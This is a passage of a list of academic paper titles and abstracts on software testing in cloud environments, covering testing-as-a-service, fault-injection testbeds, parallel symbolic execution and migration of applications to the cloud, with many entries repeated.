“cloud” implementation available today. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: Testing as a Service over Cloud paper_content: Testing-as-a-service (TaaS) is a new model to provide testing capabilities to end users. Users save the cost of complicated maintenance and upgrade effort, and service providers can upgrade their services without impact on the end-users. Due to uneven volumes of concurrent requests, it is important to address the elasticity of TaaS platform in a cloud environment. Scheduling and dispatching algorithms are developed to improve the utilization of computing resources. We develop a prototype of TaaS over cloud, and evaluate the scalability of the platform by increasing the test task load, analyze the distribution of computing time on test task scheduling and test task processing over the cloud, and examine the performance of proposed algorithms by comparing others --- paper_title: Customizing Virtual Machine with Fault Injector by Integrating with SpecC Device Model for a Software Testing Environment D-Cloud paper_content: D-Cloud is a software testing environment for dependable parallel and distributed systems using cloud computing technology. We use Eucalyptus as cloud management software to manage virtual machines designed based on QEMU, called FaultVM, which have a fault injection mechanism. D-Cloud enables the test procedures to be automated using a large amount of computing resources in the cloud by interpreting the system configuration and the test scenario written in XML in D-Cloud front end and enables tests including hardware faults by emulating hardware faults by FaultVM flexibly. In the present paper, we describe the customization facility of FaultVM used to add new device models. We use SpecC, which is a system description language, to describe the behavior of devices, and a simulator generated from the description by SpecC is linked and integrated into FaultVM. This also makes the definition and injection of faults flexible without the modification of the original QEMU source codes. This facility allows D-Cloud to be used to test distributed systems with customized devices. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. The traditional approach of test case generation and execution can take weeks and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that it Splitter can effectively automate post-migration testing while also reduce the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. --- paper_title: Testing as a Service over Cloud paper_content: Testing-as-a-service (TaaS) is a new model to provide testing capabilities to end users. Users save the cost of complicated maintenance and upgrade effort, and service providers can upgrade their services without impact on the end-users. Due to uneven volumes of concurrent requests, it is important to address the elasticity of TaaS platform in a cloud environment. Scheduling and dispatching algorithms are developed to improve the utilization of computing resources. We develop a prototype of TaaS over cloud, and evaluate the scalability of the platform by increasing the test task load, analyze the distribution of computing time on test task scheduling and test task processing over the cloud, and examine the performance of proposed algorithms by comparing others --- paper_title: Open Cirrus: A Global Cloud Computing Testbed paper_content: Open Cirrus is a cloud computing testbed that, unlike existing alternatives, federates distributed data centers. It aims to spur innovation in systems and applications research and catalyze development of an open source service stack for the cloud. --- paper_title: Testing Tasks Management in Testing Cloud Environment paper_content: In testing Cloud environment testing tasks requested by different tenants have many uncertainties. The arriving time, deadline and the number of tasks are unknown in advance. Especially, the relationships between testing tasks and testing environments are very complex. How to efficiently manage these tasks is really a challenging problem. This paper studies the special features of testing tasks and presents a task management framework. We analyze the dependencies and conflicts associated with testing tasks and their related runtime environments, using rule matching mechanism to derive the relationships supported by domain knowledge. Based on these analyses, improved algorithms are introduced to cluster and dynamically schedule testing tasks to minimize the make-span or meet deadlines with the consideration of testing task resource requirements and Cloud resource utilization balance at the same time. A fault tolerance mechanism is built to cope with testing errors, whose results are studied to ameliorate clustering and scheduling algorithms. A suite of experiments compares the effectiveness of the proposed approach with other algorithms. --- paper_title: Modeling and testing of cloud applications paper_content: What is a cloud application precisely? In this paper, we formulate a computing cloud as a kind of graph, a computing resource such as services or intellectual property access rights as an attribute of a graph node, and the use of a resource as a predicate on an edge of the graph. We also propose to model cloud computation semantically as a set of paths in a subgraph of the cloud such that every edge contains a predicate that is evaluated to be true. Finally, we present algorithms to compose cloud computations and a family of model-based testing criteria to support the testing of cloud applications. --- paper_title: D-Cloud: Design of a Software Testing Environment for Reliable Distributed Systems Using Cloud Computing Technology paper_content: In this paper, we propose a software testing environment, called D-Cloud, using cloud computing technology and virtual machines with fault injection facility. Nevertheless, the importance of high dependability in a software system has recently increased, and exhaustive testing of software systems is becoming expensive and time-consuming, and, in many cases, sufficient software testing is not possible. In particular, it is often difficult to test parallel and distributed systems in the real world after deployment, although reliable systems, such as high-availability servers, are parallel and distributed systems. D-Cloud is a cloud system which manages virtual machines with fault injection facility. D-Cloud sets up a test environment on the cloud resources using a given system configuration file and executes several tests automatically according to a given scenario. In this scenario, D-Cloud enables fault tolerance testing by causing device faults by virtual machine. We have designed the D-Cloud system using Eucalyptus software and a description language for system configuration and the scenario of fault injection written in XML. We found that the D-Cloud system, which allows a user to easily set up and test a distributed system on the cloud and effectively reduces the cost and time of testing. --- paper_title: Research in concurrent software testing: a systematic review paper_content: The current increased demand for distributed applications in domains such as web services and cloud computing has significantly increased interest in concurrent programming. This demand in turn has resulted in new testing methodologies for such systems, which take account of the challenges necessary to test these applications. This paper presents a systematic review of the published research related to concurrent testing approaches, bug classification and testing tools. A systematic review is a process of collection, assessment and interpretation of the published papers related to a specific search question, designed to provide a background for further research. The results include information about the research relationships and research teams that are working in the different areas of concurrent programs testing. --- paper_title: Modeling and testing of cloud applications paper_content: What is a cloud application precisely? In this paper, we formulate a computing cloud as a kind of graph, a computing resource such as services or intellectual property access rights as an attribute of a graph node, and the use of a resource as a predicate on an edge of the graph. We also propose to model cloud computation semantically as a set of paths in a subgraph of the cloud such that every edge contains a predicate that is evaluated to be true. Finally, we present algorithms to compose cloud computations and a family of model-based testing criteria to support the testing of cloud applications. --- paper_title: Software Engineering Challenges for Migration to the Service Cloud Paradigm: Ongoing Work in the REMICS Project paper_content: This paper presents on-going work in a research project on defining methodology and tools for model-driven migration of legacy applications to a service-oriented architecture with deployment in the cloud, i.e. the Service Cloud paradigm. We have performed a comprehensive state of the art analysis and present some findings here. In parallel, the two industrial participants in the project have specified their requirements and expectations regarding modernization of their applications. The SOA paradigm implies the breakdown of architecture into high-grain components providing business services. For taking advantage of the services of cloud computing technologies, the clients' architecture should be decomposed, decoupled and be made scalable. Also requirements regarding servers, data storage and security, networking and response time, business models and pricing should be projected. We present software engineering challenges related to these aspects and examples of these in the context of one of the industrial cases in the project. --- paper_title: Research Issues for Software Testing in the Cloud paper_content: Cloud computing is causing a paradigm shift in the provision and use of computing services, away from the traditional desktop form to online services. This implies that the manner in which these computing services are tested should also change. This paper discusses the research issues that cloud computing imposes on software testing. These issues were gathered during interviews with industry practitioners from eleven software organizations. The interviews were analyzed using qualitative grounded theory method. Findings of the study were compared with existing literature. The research issues were categorized according to application, management, legal and financial issues. By addressing these issues, researchers can offer reliable recommendation for practitioners in the industry. --- paper_title: Engineering the cloud from software modules paper_content: Cloud computing faces many of the challenges and difficulties of distributed and parallel software. While the service interface hides the actual application from the remote user, the application developer still needs to come to terms with distributed software that needs to run on dynamic clusters and operate under a wide range of configurations. In this paper, we outline our vision of a model and runtime platform for the development, deployment, and management of software applications on the cloud. Our basic idea is to turn the notion of software module into a first class entity used for management and distribution that can be autonomously managed by the underlying software fabric of the cloud. In the paper we present our model, outline an initial implementation, and describe a first application developed using the ideas presented in the paper. --- paper_title: Parallel symbolic execution for automated real-world software testing paper_content: This paper introduces Cloud9, a platform for automated testing of real-world software. Our main contribution is the scalable parallelization of symbolic execution on clusters of commodity hardware, to help cope with path explosion. Cloud9 provides a systematic interface for writing "symbolic tests" that concisely specify entire families of inputs and behaviors to be tested, thus improving testing productivity. Cloud9 can handle not only single-threaded programs but also multi-threaded and distributed systems. It includes a new symbolic environment model that is the first to support all major aspects of the POSIX interface, such as processes, threads, synchronization, networking, IPC, and file I/O. We show that Cloud9 can automatically test real systems, like memcached, Apache httpd, lighttpd, the Python interpreter, rsync, and curl. We show how Cloud9 can use existing test suites to generate new test cases that capture untested corner cases (e.g., network stream fragmentation). Cloud9 can also diagnose incomplete bug fixes by analyzing the difference between buggy paths before and after a patch. --- paper_title: Customizing Virtual Machine with Fault Injector by Integrating with SpecC Device Model for a Software Testing Environment D-Cloud paper_content: D-Cloud is a software testing environment for dependable parallel and distributed systems using cloud computing technology. We use Eucalyptus as cloud management software to manage virtual machines designed based on QEMU, called FaultVM, which have a fault injection mechanism. D-Cloud enables the test procedures to be automated using a large amount of computing resources in the cloud by interpreting the system configuration and the test scenario written in XML in D-Cloud front end and enables tests including hardware faults by emulating hardware faults by FaultVM flexibly. In the present paper, we describe the customization facility of FaultVM used to add new device models. We use SpecC, which is a system description language, to describe the behavior of devices, and a simulator generated from the description by SpecC is linked and integrated into FaultVM. This also makes the definition and injection of faults flexible without the modification of the original QEMU source codes. This facility allows D-Cloud to be used to test distributed systems with customized devices. --- paper_title: Testing in the Cloud: Exploring the Practice paper_content: As applications and services migrate to the cloud, testing will follow the same trend. Therefore, organizations must understand the dynamics of cloud-based testing. This article presents interviews with eight organizations that use cloud computing. The results suggest that cloud computing can make testing faster and enhance the delivery of testing services. Cloud computing also highlights important aspects of testing that require attention, such as integration and interoperability. This article includes a Web extra that provides additional references for further study. --- paper_title: Application migration to cloud: a taxonomy of critical factors paper_content: Cloud computing has attracted attention as an important platform for software deployment, with perceived benefits such as elasticity to fluctuating load, and reduced operational costs compared to running in enterprise data centers. While some software is written from scratch specially for the cloud, many organizations also wish to migrate existing applications to a cloud platform. Such a migration exercise to a cloud platform is not easy: some changes need to be made to deal with differences in software environment, such as programming model and data storage APIs, as well as varying performance qualities. We report here on experiences in doing a number of sample migrations. We propose a taxonomy of the migration tasks involved, and we show the breakdown of costs among categories of task, for a case-study which migrated a .NET n-tier application to run on Windows Azure. We also indicate important factors that impact on the cost of various migration tasks. This work contributes towards our future direction of building a framework for cost-benefit tradeoff analysis that would apply to migrating applications to cloud platforms, and could help decision-makers evaluate proposals for using cloud computing. --- paper_title: Using realistic simulation for performance analysis of mapreduce setups paper_content: Recently, there has been a huge growth in the amount of data processed by enterprises and the scientific computing community. Two promising trends ensure that applications will be able to deal with ever increasing data volumes: First, the emergence of cloud computing, which provides transparent access to a large number of compute, storage and networking resources; and second, the development of the MapReduce programming model, which provides a high-level abstraction for data-intensive computing. However, the design space of these systems has not been explored in detail. Specifically, the impact of various design choices and run-time parameters of a MapReduce system on application performance remains an open question. To this end, we embarked on systematically understanding the performance of MapReduce systems, but soon realized that understanding effects of parameter tweaking in a large-scale setup with many variables was impractical. Consequently, in this paper, we present the design of an accurate MapReduce simulator, MRPerf, for facilitating exploration of MapReduce design space. MRPerf captures various aspects of a MapReduce setup, and uses this information to predict expected application performance. In essence, MRPerf can serve as a design tool for MapReduce infrastructure, and as a planning tool for making MapReduce deployment far easier via reduction in the number of parameters that currently have to be hand-tuned using rules of thumb. Our validation of MRPerf using data from medium-scale production clusters shows that it is able to predict application performance accurately, and thus can be a useful tool in enabling cloud computing. Moreover, an initial application of MRPerf to our test clusters running Hadoop, revealed a performance bottleneck, fixing which resulted in up to 28.05% performance improvement. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. The traditional approach of test case generation and execution can take weeks and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that it Splitter can effectively automate post-migration testing while also reduce the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: VIAF: Verification-Based Integrity Assurance Framework for MapReduce paper_content: MapReduce, a cloud computing paradigm, is gaining popularity. However, like all open distributed computing frameworks, MapReduce suffers from the integrity assurance vulnerability: it takes merely one malicious worker to render the overall computation result useless. Existing solutions are effective in defeating the malicious behavior of non-collusive workers, but are futile in detecting collusive workers. In this paper, we focus on the mappers, which typically constitute the majority of workers, and propose the Verification-based Integrity Assurance Framework (VIAF) to detect both non-collusive and collusive mappers. The basic idea of VIAF is to combine task replication with non-deterministic verification, in which consistent but malicious results from collusive mappers can be detected by a trusted verifier. We have implemented VIAF in Hadoop, an open source MapReduce implementation. Our theoretical analysis and experimental result show that VIAF can achieve high task accuracy while imposing acceptable overhead. --- paper_title: When to Migrate Software Testing to the Cloud? paper_content: Testing is a challenging activity for many software engineering projects, especially for large-scale systems. The amount of tests cases can range from a few hundred to several thousands, requiring significant computing resources and lengthy execution times. Cloud computing offers the potential to address both of these issues: it offers resources such as virtualized hardware, effectively unlimited storage, and software services that can aid in reducing the execution time of large test suites in a cost-effective manner. However, migrating to the cloud is not without cost, nor is it necessarily the best solution to all testing problems. This paper discusses when to migrate software testing to the cloud from two perspectives: the characteristics of an application under test, and the types of testing performed on the application. --- paper_title: On the Standardization of a Testing Framework for Application Deployment on Grid and Cloud Infrastructures paper_content: An important requirement in the successful deployment of grid and cloud computing technology in industry or governmental institutions is the ability to compose their infrastructures using equipment from different vendors. These equipments have to be engineered for and assessed to assure a problem-free interoperation. Focusing on software interoperability, we present a testing framework for the assessment of interoperability of grid and cloud computing infrastructures. This testing framework is part of an initiative for standardizing the use of grid and cloud technology in the context of telecommunication at the European Telecommunications Standards Institute. Following the test development process developed and used at the European Telecommunications Standards Institute, its application is exemplified by the assessment of for resource reservation and application deployment onto grid and cloud infrastructures based on standardized Grid Component Model descriptors. The presented testing framework has been applied successfully in an interoperability event. --- paper_title: Open Cirrus: A Global Cloud Computing Testbed paper_content: Open Cirrus is a cloud computing testbed that, unlike existing alternatives, federates distributed data centers. It aims to spur innovation in systems and applications research and catalyze development of an open source service stack for the cloud. --- paper_title: Towards a scalable and robust multi-tenancy SaaS paper_content: Software-as-as-Service (SaaS) is a new approach for developing software, and it is characterized by its multi-tenancy architecture and its ability to provide flexible customization to individual tenant. However, the multi-tenancy architecture and customization requirements have brought up new issues in software, such as database design, database partition, scalability, recovery, and continuous testing. This paper proposes a hybrid test database design to support SaaS customization with two-layer database partitioning. The database is further extended with a new built-in redundancy with ontology so that the SaaS can recover from ontology, data or meta-data failures. Furthermore, constraints in metadata can be used either as test cases or policies to support SaaS continuous testing and policy enforcement. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. --- paper_title: Risk-Based Security Testing in Cloud Computing Environments paper_content: Assuring the security of a software system in terms of testing nowadays still is a quite tricky task to conduct. Security requirements are taken as a foundation to derive tests to be executed against a system under test. Yet, these positive requirements by far do not cover all the relevant security aspects to be considered. Hence, especially in the event of security testing, negative requirements, derived from risk analysis, are vital to be incorporated. If considering today's emerging trend in the adoption of cloud computing, security testing even has a more important significance. Due to a cloud's openness, in theory there exists an infinite number of tests. Hence, a concise technique to incorporate the results of risk analysis in security testing is inevitable. We therefore propose a new model-driven methodology for the security testing of cloud environments, ingesting misuse cases, defined by negative requirements derived from risk analysis. --- paper_title: Cloud9: a software testing service paper_content: Cloud9 aims to reduce the resource-intensive and laborintensive nature of high-quality software testing. First, Cloud9 parallelizes symbolic execution (an effective, but still poorly scalable test automation technique) to large shared-nothing clusters. To our knowledge, Cloud9 is the first symbolic execution engine that scales to large clusters of machines, thus enabling thorough automated testing of real software in conveniently short amounts of time. Preliminary results indicate one to two orders of magnitude speedup over a state-of-the-art symbolic execution engine. Second, Cloud9 is an on-demand software testing service: it runs on compute clouds, like Amazon EC2, and scales its use of resources over a wide dynamic range, proportionally with the testing task at hand. --- paper_title: An environment for evaluation and testing of service workflow schedulers in clouds paper_content: Workflows built through service composition bring new challenges, making the scheduling task even more complex. Besides that, scheduling researchers need a wide range of workflows and their respective services to validate new achievements. In this paper we present a service oriented testbed where experiments can be conducted to develop and evaluate algorithms, heuristics, and scheduling policies for workflows. Our testbed offers an emulator service which allows the workflow characterization through the description of its services. With this, researchers can build workflows which have similar behavior to the real workflow applications, emulating them without the need of implementing all applications and services involved in a real application execution. To demonstrate the utilization of both the testbed and emulator, we conducted workflow executions emulating service workflow applications, such as Montage and LIGO. --- paper_title: An Approach for Service Composition and Testing for Cloud Computing paper_content: As cloud services proliferate, it becomes difficult to facilitate service composition and testing in clouds. In traditional service-oriented computing, service composition and testing are carried out independently. This paper proposes a new approach to manage services on the cloud so that it can facilitate service composition and testing. The paper uses service implementation selection to facilitate service composition similar to Google’s Guice and Spring tools, and apply the group testing technique to identify the oracle, and use the established oracle to perform continuous testing for new services or compositions. The paper extends the existing concept of template based service composition and focus on testing the same workflow of service composition. In addition, all these testing processes can be executed in parallel, and the paper illustrates how to apply service-level MapReduce technique to accelerate the testing process. --- paper_title: Application-Oriented Remote Verification Trust Model in Cloud Computing paper_content: The emergence and application of cloud computing can help users access to various computing resources and services more conveniently. However, it also brings forth many security challenges. This paper proposes the application oriented remote verification trust model, which is capable of adjusting the useri¯s trust authorization verification contents according to the specific security requirements of different applications. The model also dynamically adjusts the usersi¯trust value with the trust feedback mechanism to determine whether or not the requested resource or service should be provided, so as to guarantee the security of information resources. This paper provides a formal description of the basic components and trust properties of the model with a belief formula, and describes the framework for the implementation of the model. --- paper_title: Large-Scale Software Testing Environment Using Cloud Computing Technology for Dependable Parallel and Distributed Systems paper_content: Various information systems are widely used in information society era, and the demand for highly dependable system is increasing year after year. However, software testing for such a system becomes more difficult due to the enlargement and the complexity of the system. In particular, it is too difficult to test parallel and distributed systems sufficiently although dependable systems such as high-availability servers usually form parallel and distributed systems. To solve these problems, we proposed a software testing environment for dependable parallel and distributed system using the cloud computing technology, named D-Cloud. D-Cloud includes Eucalyptus as the cloud management software, and FaultVM based on QEMU as the virtualization software, and D-Cloud frontend for interpreting test scenario. D-Cloud enables not only to automate the system configuration and the test procedure but also to perform a number of test cases simultaneously, and to emulate hardware faults flexibly. In this paper, we present the concept and design of D-Cloud, and describe how to specify the system configuration and the test scenario. Furthermore, the preliminary test example as the software testing using D-Cloud was presented. Its result shows that D-Cloud allows to set up the environment easily, and to test the software testing for the distributed system. --- paper_title: Cloud Services Testing: An Understanding paper_content: There is a mammoth quantity of Cloud Services being deployed on the Cloud, nowadays. Everyday users and customers use these services to fulfil their needs. The use of Cloud Services is getting more and more complex with the pace of time. It is a possibility that several recurrent service requests cannot be fulfilled using just one Cloud service. Cloud services are usually composed manually, which is a time consuming and monotonous task. We can find several numbers of successful methods for automatic Cloud service composition, the main issue with that is the lack of test environment with some standards to compare and evaluate these methods. This research work is about a short survey to explore Cloud Services testing methods. This study compares several software testing researches and pose questions for further research work to find Cloud suited testing techniques for the software testers. This survey paper poses few questions to the Cloud computing research community to concentrate and find suited answers for software testing community. --- paper_title: Parallel symbolic execution for structural test generation paper_content: Symbolic execution is a popular technique for automatically generating test cases achieving high structural coverage. Symbolic execution suffers from scalability issues since the number of symbolic paths that need to be explored is very large (or even infinite) for most realistic programs. To address this problem, we propose a technique, Simple Static Partitioning, for parallelizing symbolic execution. The technique uses a set of pre-conditions to partition the symbolic execution tree, allowing us to effectively distribute symbolic execution and decrease the time needed to explore the symbolic execution tree. The proposed technique requires little communication between parallel instances and is designed to work with a variety of architectures, ranging from fast multi-core machines to cloud or grid computing environments. We implement our technique in the Java PathFinder verification tool-set and evaluate it on six case studies with respect to the performance improvement when exploring a finite symbolic execution tree and performing automatic test generation. We demonstrate speedup in both the analysis time over finite symbolic execution trees and in the time required to generate tests relative to sequential execution, with a maximum analysis time speedup of 90x observed using 128 workers and a maximum test generation speedup of 70x observed using 64 workers. --- paper_title: VATS: Virtualized-Aware Automated Test Service paper_content: It is anticipated that by 2015 more than 75% of Information Technology infrastructure will be purchased as a service from service providers. Services will be hosted in virtualized shared resource pools referred to as Clouds. Service providers will need to ensure that customer performance requirements are satisfied while consuming an acceptable quantity of resources. This paper describes a Virtualization-aware Automated Testing Service (VATS). VATS is a framework for automated test execution in Cloud computing environments. It executes tests, manipulates virtualized infrastructure, and collects performance information. VATS uses HP LoadRunner as a load generator and provides the foundation for an automatic performance evaluator for Cloud environments. A case study describes our use of VATS with an SAP R/3 system running in a Xen-based virtualized resource pool. The results from VATS are used to determine the impact of virtual machine configuration parameters on a SAP system. --- paper_title: Leveraging Cloud Platform for Custom Application Development paper_content: Compared with packaged application, custom application developments (CAD) experience the frustration of higher project overhead and less certainty. The typical time spent on building the infrastructure for a CAD project is, on average, several weeks. Project uncertainty comes from unique customer requirements and lack of standardized methods and toolsets to follow. Therefore, a CAD project is more difficult to achieve cost reduction and asset reuse. In this paper, we present a cloud platform to alleviate this problem through an integration of a) standard methods, b) standardized toolsets aligned with those methods, c) project management environments with pre-defined work breakdown structure (WBS) aligned with those methods and toolsets, and d) infrastructure support from the cloud technology. We believe that such a cloud platform will become a fundamental approach for large enterprises to develop CAD or other solutions for their clients. --- paper_title: Environment Modeling for Automated Testing of Cloud Applications paper_content: Recently, cloud computing platforms, such as Microsoft Azure, are available to provide convenient infrastructures such that cloud applications could conduct cloud and data-intensive computing. To ensure high quality of cloud applications under development, developer testing (also referred to as unit testing) could be used. The behavior of a unit in a cloud application is dependent on the test inputs as well as the state of the cloud environment. Generally, manually providing various test inputs and cloud states for conducting developer testing is time-consuming and labor-intensive. To reduce the manual effort, developers could employ automated test generation tools. However, applying an automated test generation tool faces the challenge of generating various cloud states for achieving effective testing, such as achieving high structural coverage of the cloud application since these tools cannot control the cloud environment. To address this challenge, we propose an approach to (1) model the cloud environment for simulating the behavior of the real environment and, (2) apply Dynamic Symbolic Execution (DSE), to both generate test inputs and cloud states to achieve high structural coverage. We apply our approach on some open source Azure cloud applications. The result shows that our approach automatically generates test inputs and cloud states to achieve high structural coverage of the cloud application. --- paper_title: Automated software testing as a service paper_content: This paper makes the case for TaaS--automated software testing as a cloud-based service. We present three kinds of TaaS: a "programmer's sidekick" enabling developers to thoroughly and promptly test their code with minimal upfront resource investment; a "home edition" on-demand testing service for consumers to verify the software they are about to install on their PC or mobile device; and a public "certification service," akin to Underwriters Labs, that independently assesses the reliability, safety, and security of software. TaaS automatically tests software, without human involvement from the service user's or provider's side. This is unlike today's "testing as a service" businesses, which employ humans to write tests. Our goal is to take recently proposed techniques for automated testing--even if usable only on to y programs--and make them practical by modifying them to harness the resources of compute clouds. Preliminary work suggests it is technically feasible to do so, and we find that TaaS is also compelling from a social and business point of view. --- paper_title: Research Issues for Software Testing in the Cloud paper_content: Cloud computing is causing a paradigm shift in the provision and use of computing services, away from the traditional desktop form to online services. This implies that the manner in which these computing services are tested should also change. This paper discusses the research issues that cloud computing imposes on software testing. These issues were gathered during interviews with industry practitioners from eleven software organizations. The interviews were analyzed using qualitative grounded theory method. Findings of the study were compared with existing literature. The research issues were categorized according to application, management, legal and financial issues. By addressing these issues, researchers can offer reliable recommendation for practitioners in the industry. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: Software Engineering Challenges for Migration to the Service Cloud Paradigm: Ongoing Work in the REMICS Project paper_content: This paper presents on-going work in a research project on defining methodology and tools for model-driven migration of legacy applications to a service-oriented architecture with deployment in the cloud, i.e. the Service Cloud paradigm. We have performed a comprehensive state of the art analysis and present some findings here. In parallel, the two industrial participants in the project have specified their requirements and expectations regarding modernization of their applications. The SOA paradigm implies the breakdown of architecture into high-grain components providing business services. For taking advantage of the services of cloud computing technologies, the clients' architecture should be decomposed, decoupled and be made scalable. Also requirements regarding servers, data storage and security, networking and response time, business models and pricing should be projected. We present software engineering challenges related to these aspects and examples of these in the context of one of the industrial cases in the project. --- paper_title: Application migration to cloud: a taxonomy of critical factors paper_content: Cloud computing has attracted attention as an important platform for software deployment, with perceived benefits such as elasticity to fluctuating load, and reduced operational costs compared to running in enterprise data centers. While some software is written from scratch specially for the cloud, many organizations also wish to migrate existing applications to a cloud platform. Such a migration exercise to a cloud platform is not easy: some changes need to be made to deal with differences in software environment, such as programming model and data storage APIs, as well as varying performance qualities. We report here on experiences in doing a number of sample migrations. We propose a taxonomy of the migration tasks involved, and we show the breakdown of costs among categories of task, for a case-study which migrated a .NET n-tier application to run on Windows Azure. We also indicate important factors that impact on the cost of various migration tasks. This work contributes towards our future direction of building a framework for cost-benefit tradeoff analysis that would apply to migrating applications to cloud platforms, and could help decision-makers evaluate proposals for using cloud computing. --- paper_title: Using realistic simulation for performance analysis of mapreduce setups paper_content: Recently, there has been a huge growth in the amount of data processed by enterprises and the scientific computing community. Two promising trends ensure that applications will be able to deal with ever increasing data volumes: First, the emergence of cloud computing, which provides transparent access to a large number of compute, storage and networking resources; and second, the development of the MapReduce programming model, which provides a high-level abstraction for data-intensive computing. However, the design space of these systems has not been explored in detail. Specifically, the impact of various design choices and run-time parameters of a MapReduce system on application performance remains an open question. To this end, we embarked on systematically understanding the performance of MapReduce systems, but soon realized that understanding effects of parameter tweaking in a large-scale setup with many variables was impractical. Consequently, in this paper, we present the design of an accurate MapReduce simulator, MRPerf, for facilitating exploration of MapReduce design space. MRPerf captures various aspects of a MapReduce setup, and uses this information to predict expected application performance. In essence, MRPerf can serve as a design tool for MapReduce infrastructure, and as a planning tool for making MapReduce deployment far easier via reduction in the number of parameters that currently have to be hand-tuned using rules of thumb. Our validation of MRPerf using data from medium-scale production clusters shows that it is able to predict application performance accurately, and thus can be a useful tool in enabling cloud computing. Moreover, an initial application of MRPerf to our test clusters running Hadoop, revealed a performance bottleneck, fixing which resulted in up to 28.05% performance improvement. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. The traditional approach of test case generation and execution can take weeks and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that it Splitter can effectively automate post-migration testing while also reduce the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: When to Migrate Software Testing to the Cloud? paper_content: Testing is a challenging activity for many software engineering projects, especially for large-scale systems. The amount of tests cases can range from a few hundred to several thousands, requiring significant computing resources and lengthy execution times. Cloud computing offers the potential to address both of these issues: it offers resources such as virtualized hardware, effectively unlimited 